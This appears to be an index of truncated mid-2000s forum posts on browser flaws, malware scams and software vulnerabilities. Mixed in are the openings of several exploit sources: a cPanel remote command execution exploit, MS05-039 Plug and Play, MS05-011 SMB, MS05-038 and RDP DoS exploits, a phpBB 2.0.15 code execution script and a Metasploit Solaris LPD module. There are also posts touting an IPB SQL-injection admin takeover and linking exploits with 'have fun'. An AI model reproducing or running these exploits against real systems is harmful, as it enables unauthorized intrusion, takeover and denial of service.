QUOTE Many people are switching from Internet Explorer to alternative browsers such as Firefox
and Safari. Though that might make them feel more secure, the shift has also opened new doors for
bad guys. Case in point: We have no IE bugs to report this month, but both Firefox and Safari have
been hit hard. So forget the idea that just because you've switched to a new browser,
you're magically safer. You may be for a time, but to stay safe with any software, you need to
keep current with fixes. Firefox Holes In a somewhat dubious recognition of Firefox's...

A pair days ago I read this new on Slashdot: cPanel Exploit Used to Circulate IE Exploit
QUOTE "In a dangerous combination of unpatched exploits, hackers have used a previously
undiscovered security hole in cPanel to hack the servers of a hosting company and use hundreds of
hijacked sites to infect Internet Explorer users with malware using the unpatched VML exploit.
cPanel, whose hosting automation software is used by many large hosting companies, has issued a fix.
It's a local exploit, meaning the attacker must control a cPanel account on the target hosti...

OH NO!!! (sarcasm there) QUOTE A flaw in the way the Firefox and Opera browsers
handle an image file could allow an attacker to see what Web sites a person has visited. The
problem concerns how the two browsers handle a ".BMP," or bitmap, image file, according to an
advisory written by Gynvael Coldwind of Vexillium.org, who posted a video illustrating the problem.
A malicious bitmap file can be created that pulls other information from the browsers' memory.
Some of the information that can be captured is random, but at other times could be valuable...

I just got a new laptop, and of course it's loaded with vista. Everything works awesomly!
(my last PC was from 2001, BIG DIFF.) But the damned thing compulsivly and automatically sets
Internet Explorer to my default browser and won't let me change certain things which browsers
will typically handle. 've manually changed it so Firefox handles all the stuff except HTTPS
and what not (CANNOT CHANGE W/O HACK!), but IE just bumps in every time I want to click a link
from a non-browser based file /sad.gif" style="vertical-align:middle" emoid=":(" border="...

On monday it was reported that Quicktime 7.2 and 7.3 versions come with a new exploit in which
malware could on to a person's computer through streaming videos. They only mention that XP and
Vista are the only affect systems and no word came about on the Mac operating system. They mention
that a buffer overflow bug was made in which it "contains a stack buffer overflow vulnerability in
the way Quicktime handles the RTSP Content-Type header." For those who don't know what RTSP is,
RTSP is the Real-Time Streaming Protocol which apple uses for its QuickTime softw...

Well it seems firefox flaws are becoming a popular now, the two flaws that have been reported all
follow the same protocol that had posted about before; QUOTE The flaw lies in Firefox's URL
handler component.. Like the first flaw, this one could be exploited by attackers to launch
programs on the victim's PC without authorization, said Tyler Reguly, a security research
engineer at nCircle Network Security Inc. "They're both related to the URL handling process," he
said "It's just different errors within that handling process." So far it would se...

Well it has finally happen and strangely enough I didn't really think about it until now, but it
seems a security team found a very high level bug that requires both Internet Explorer 7 and
Modzilla Fire Fox. This is the jist of the bug; QUOTE The root of the matter is a Firefox
uniform resource identifier (URI) that allows Web sites to force Firefox to launch with the
"firefoxurl://" URI, Secunia reported. The way in which the URI handler is registered by Firefox
causes any parameter to be passed from IE (or another application) to Firefox when the "firefoxurl...

Link to Article: http://news.com.com/Hackers+claim+zero-day..._3-6121608.html Thought this was
interesting. Really caught me offgaurd, didn't expect such a huge flaw on a GPL based program.
Whats even more scary is they said they have about 30 other flaws found......

Windows has been acting strangely by now, it freezes/clogs badly, I can't use Opera, MF or
continue my tutorials due to this problem. It gets on my nerves as I think it was MY problem because
I deleted MOST of the files in the Temp folder. CODE (Start>Run...>%Temp%)
That folder, most of the files were deleted by me. I consulted my friend by half-screwed MSN, he
said I "effed me up the arse" by doing that. He recommended me backing up and formatting. I never
did that before so I think it will be most-likely half-impossible for me. And as I d...

Invision Power Board v2.1.6 © 2006 IPS, Inc. This is what it is written on the bottom of the
board. Not so long ago, i was surfing somewhere, (i wont say where) and i discovered a "sql
injection"exploit, a perl script. QUOTE(step28 in the hack) 28. Reload and click on the
username to the admin. You are now logged in as an ADMIN!!! Admins, pm to receive
the link where i found this. with this hack, you can log in with any user without his pass.
It's really easy to do, you just need PERL, Opera webbrowser and 3 minutes fo your life... ...

A friend of mine was temporarily banned from the computers at my school a while ago after he
accidentially found a way into Task Manager, which is disabled on our network. He has had his
permissions restored now, but has no idea why he got banned in the first place. However, recently he
explained what he did to me, and I tested it. I soon found out that, by accident, we had both
discovered that there is a Security Exploit in networking Windows XP Professional. The exploit is
to do with network permissions. Windows XP recieves the permission data from the network as soon...

This has blown up big time in the last 3 days: http://www.f-secure.com/weblog/ ...

I got this information from mailing list. yesterday I didn't know why my pc always heavy to be
loaded. and now i got the answer read Firefox Flaws For A Simple Way. if you use Mozilla
Firefox 1.5 as your default browser. type Ctrl+Alt+del or open Task Manager. You will see how much
memory being used by firefox. QUOTE(www.informationweek.com) On December 8, 2005, we published
a story that wondered: Firefox 1.5: Not Ready For Prime Time? In response, some 450 (and climbing)
InternetWeek, InformationWeek, TechWeb Pipelines, and Scot's Newsletter readers ha...

For Internet Explorer users, please note that there is a new exploit in the wild that is capable of
compromising a fully patched and updated WinXP machine:
http://www.eweek.com/article2/0,1759,18917...3119TX1K0000594 Microsoft has not released a fix yet.
From the article: QUOTE IE users should immediately disable Active Scripting via the Tools >
Internet Options > Security tab > Custom Level feature. Firefox and other alternative web
browsers are not affected. You would have to be tricked into going to a malicious website to have
any chance of being affecte...

Exploit for cPanel versions below and equal to 9x that takes advantage of a remote command execution
vulnerability. /* cPanel */ //headers #include //In/Out #include //sockets functions
#include //memory functions #include //strlen,strcat,strcpy #pragma comment(lib,"ws2_32.lib")
//for compile with dev-c++ link to "libws2_32.lib" #define Port 2082 //port for connect to cPanel
#define SIZE 1024 //buffer size to receive the data /*connect host:port*/ SOCKET Conecta(char
*Host, short puerto) { /*struct for make the socket*/ WSADATA wsaData; SOCKET Winsock;//l...

To some this may seem a bit late. Firefox has released a new version that covers several critical
issues, and adds more stability. It is a wonderful alternative to Internet Exploer, and offers (in
my opinion) more security because it blocks most spyware. Article:
http://www.mozilla.org/products/firefox/releases/1.0.7.html Fixes:
http://www.mozilla.org/projects/security/k...es.html#Firefox Download:
http://download.mozilla.org/?product=firef...=win&lang=en-US ...

In the wake of hurricane Katrina, several online scams have begun to circulate the Internet,
according to several security firms. Sophos warned users on Thursday not to open a malware-Infected
e-mail posing as news on the disaster. Possible subject lines of the e-mail could be QUOTE
"Re: g8 Tropical storm flooded New Orleans", "Re: g7 80 percent of our city underwater", and "Re:
q1 Katrina killed as many as 80 people". The group said there could be additional variants.
BetaNews on Thursday morning had received a variant of the above e-mails, however it app...

Microsoft Windows 2000 Plug and Play Universal Remote Exploit #2 (MS05-039) /*
HOD-ms05039-pnp-expl.c: 2005-08-10: PUBLIC v.0.2 * * Copyright © 2005 houseofdabus. * * (MS05-039)
Microsoft Windows Plug-and-Play Service Remote Overflow * Universal Exploit + no crash shellcode * *
.:: ::. * * --------------------------------------------------------------------- * Description: * A
remote code execution and local elevation of privilege * vulnerability exists in Plug and Play that
could allow an * attacker who successfully exploited this vulnerability to take * complete con...

Another vulnerability in PHPbb based forums that can be used to easily gain any user level access to
the forum. Even the admin account is not not secure with the default setup. Click Here for more
details about -"How to be Admin on phpBB in Simple steps!" And here is the Homepage of
PHPbb and click here to download the latest version....

phpBB 2.0.15 "viewtopic.php" Remote PHP Code Execution Exploit #!/usr/bin/pyth0n print
"\nphpBB 2.0.15 arbitrary command execution eXploit" print " 2005 by rattle@awarenetwork.org"
print " well, just because there is none." import sys from urllib2 import Request, urlopen from
urlparse import urlparse, urlunparse from urllib import quote as quote_plus INITTAG = ' '
ENDTAG = ' ' def makecmd(cmd): return reduce(lambda x,y: x+'.chr(%d)'%ord(y),cmd
,'chr(%d)'%ord(cmd )) _ex = "%sviewtopic.php?t=%s&highlight=%%27." _ex += ...

Microsoft Server Message Block (SMB) Remote Exploit (MS05-011) /* * Windows SMB Client
Transaction Response Handling * * MS05-011 * CAN-2005-0045 * * This works against Win2k * *
cybertronic gmx net * http://www.livejournal.com/users/cybertronic/ * * usage: * gcc -o mssmb_poc
mssmb_poc.c * ./mssmb_poc * * connect via \\ip * and hit the netbios folder! * *
***STOP: 0x00000050 (0xF115B000,0x00000001,0xFAF24690, * 0x00000000) * PAGE_FAULT_IN_NONPAGED_AREA *
* The Client reboots immediately * * Technical Details: * ----------------- * * The driver MRXSMB.S...

Microsoft Internet Explorer COM Objects File Download Exploit (MS05-038)
/*+++++++++++++++++++++++++++++++++++++++++++++++ Ms05 038 exploit POC Write By ZwelL 2005 8 11
http://www.donews.net/zwell zwell@sohu.com Some code belongs to Lion(cnhonker), regards to him.
This code tested on Windows 2003 -----------------------------------------------*/ #include
#include #pragma comment(lib, "ws2_32") // Use for find the ASM code #define PROC_BEGIN __asm
_emit 0x90 __asm _emit 0x90\ __asm _emit 0x90 __asm _emit 0x90\ __asm _emit 0x90 __asm
_emit 0x90\...

Microsoft Windows 2000 Plug and Play Universal Remote Exploit (MS05-039) /* Windows 2000
universal exploit for MS05-039 -\x6d\x35\x6c\x30\x6e\x6e\x79- */
#include #include #include #include #include #include #include #pragma comment(lib,
"mpr") #pragma comment(lib, "Rpcrt4") BYTE Data1 =
{0x11,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x11,0x00,0x00,0x00,
0x52,0x00,0x4F,0x00,0x4F,0x00,0x54,0x00,0x5C,0x00,0x53,0x00,
0x59,0x00,0x53,0x00,0x54,0x00,0x45,0x00,0x4D,0x00,0x5C,0x00,
0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x00,0x0...

Microsoft Windows Remote Desktop Protocol DoS Exploit (MS05-041) // Windows XP SP2
'rdpwd.sys' Remote Kernel DoS // // Discovered by: // Tom Ferris // tommy
security-protocols com // // Tested on: // Microsoft Windows XP SP2 // // Usage (SPIKE) :
./generic_send_tcp 192.168.1.100 3389 remoteass.spk 1 0 // // 8/9/2005 Security-Protocols.com // //
This program is free software; you can redistribute it and/or modify it under // the terms of the
GNU General Public License version 2, 1991 as published by // the Free Software Foundation.
s_block_start("packet_1...

## # This file is part of the Metasploit Framework and may be redistributed # according to the
licenses defined in the Authors field below. In the # case of an unknown or missing license, this
file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest #
version of the Framework can always be obtained from metasploit.com. ## package
Msf::Exploit::solaris_lpd_unlink; use base "Msf::Exploit"; use IO::Socket; use IO::Select; use
strict; use Pex::Text; my $advanced = { }; my $info = { 'Name' => 'Solaris
LPD Arbit...

another internet explorer aecurity hole! /blink.gif' border='0' style='vertical-align:middle'
alt='blink.gif' /> here 's the exploit : http://www.milw0rm.com/id.php?id=1148 ...

wow, you can get this famous vulnerabilty exploit here: http://www.milw0rm.com/id.php?id=1149
have fun /smile.gif' border='0' style='vertical-align:middle' alt='smile.gif' /> ...

Does anyone know ? g-mail Notifier doesnt work on Firefox? It doesnt log u in it jus takz u 2 tha
login PG. Do u know ?. I accually work @ Google so its embarrasin askin hre. ...